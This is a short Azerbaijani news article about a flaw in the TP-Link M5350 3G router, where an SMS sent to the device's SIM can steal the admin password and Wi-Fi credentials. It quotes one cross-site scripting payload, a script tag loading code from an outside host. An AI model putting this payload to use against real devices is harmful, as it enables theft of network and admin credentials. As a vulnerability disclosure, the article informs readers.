Cihazın SIM-kartına SMS göndərmək yolu ilə inzibatçı uçot qeydlərinin və Wi-Fi şifrəsini əldə etmək olar. Almaniya mütəxəssisi Yan Xerş Çin istehsalı TP-Link şirkətinin marşrutlayıcılarındakı mövcud boşluqlar onun SİM-kartına xüsusi şriftlə SMS-mesaj göndərmək yolu ilə cihazın şifrəsini əldə etməyə imkan verdiyini bildirib. Problem 3G simsiz mobil - TP-Link M5350 marşrutlayıcıya aiddir. Bleepingcomputer jurnalisti ilə söhbətində tədqiqatçı açıqlayıb ki, rabitə operatorları çox vaxt öz müştərilərinə marşrutlayıcıya SİM-kart yerləşdirilən bu modeli təklif edirlər. SIM-kart marşrutlayıcıya operatorun şəbəkəsinə qoşulmağa imkan verir və istənilən digər SİM-kart kimi bunun da öz nömrəsi var. Marşrutlayıcının proqram təminatının analizi zamanı Xerş SMS-mesajların daxil olduğu emal funksiyasında mövcud boşluqları aşkara çıxartdı. O müəyyənləşdirib ki, şrift <script src=//n.ms/a.js >< /script > yolu ilə məlumatları göndərməklə inzibatçının uçot qeydlərinin şifrəsini, simsiz şəbəkə (SSID) identifikatorunu və Wi-Fi şəbəkəsinin şifrəsini əldə edə bilər.
Mütəxəssisin sözlərinə görə, təhlükə göründüyü kimi bir o qədər də qorxulu deyil, çünki mövcud boşluqların istismarı üçün cinayətkara marşrutlayıcı SİM-kartının nömrəsini bilmək lazımdır.
28 mart 2024
05 mart 2024
23 fevral 2024
13 fevral 2024
26 yanvar 2024
06 yanvar 2024
24 noyabr 2023
13 noyabr 2023
© 2011-2024 Bütün Hüquqlar Qorunur
